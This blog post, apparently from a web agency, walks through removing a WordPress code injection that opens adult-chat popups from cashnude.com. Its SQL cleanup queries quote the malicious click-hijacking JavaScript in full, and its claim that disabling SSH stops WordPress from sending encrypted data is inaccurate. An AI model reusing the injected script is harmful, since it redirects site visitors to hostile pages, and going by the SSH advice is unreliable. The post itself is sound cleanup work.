Over the years, we have seen plenty of WordPress hacks and thankfully they are usually fairly easy to diagnose. This bank holiday Monday we have fought a nasty one from cashnude.com a spammy website which opens up an adult chat as a pop up, under your site.

  

Just follow these simple steps to get rid of this nasty code injection:

1. The first thing you want to do is change your FTP (File Transfer Protocol) password, this is just an extra precaution encase your password has been comprised. Regardless it's always good practise to change your password on a regular basis, and may even help avoid more serious exploits from affecting you in the future.

 2. Next you want to disable SSH (Secure Shell) access to your server; this stops your server from sending or receiving encrypted data from WordPress to avoid any sensitive data like passwords being compromised or the code injection from spreading further.

3. Finally, you want to log in to your PHPMYADMIN and run the following query:

 

 update wp_posts set post_content = replace(post_content, '<script type="text/javascript">// <![CDATA[

function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})

// ]]></script>', '') where post_content like '%<script type="text/javascript">// <![CDATA[

function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})

// ]]></script>%';

 

 Additionally, you'll want to run the second query below.

 

 update wp_posts set post_content = replace(post_content, '<script  type='text/javascript' rel="f179568d5746648ce97a252d9b3db074">

function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})

</script>', '') where post_content like '%<script  type='text/javascript' rel="f179568d5746648ce97a252d9b3db074">

function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})

</script>%';

 

These two queries will remove the code that seems to be causing the exploit that is present on every page. The code was recording what the user clicked on, on each page and when they clicked it was opening up an adult chat under your site. By removing the code the pop up is no longer present and the code injection can be purged.

We can also use Majestic Neighbourhood Checker to check the sort of other sites hosted on the same IP to get an idea of any other sites that may potentially contain viruses to be aware of. 

 

Viruses, worms and trojan horses are all things to be vary of when using the internet as they are ever present online. In order to further protect yourself further from the threat these pieces of malware pose you should be wary using sites that you haven’t heard of or that look a bit dodgy and ensure you change your password on a regular basis, especially straight after any piece of malicious software has been dealt with. When you believe something might be infecting your website or your computer investigating it further and seeking help online are the best options for ensuring it doesn’t cause too much damage.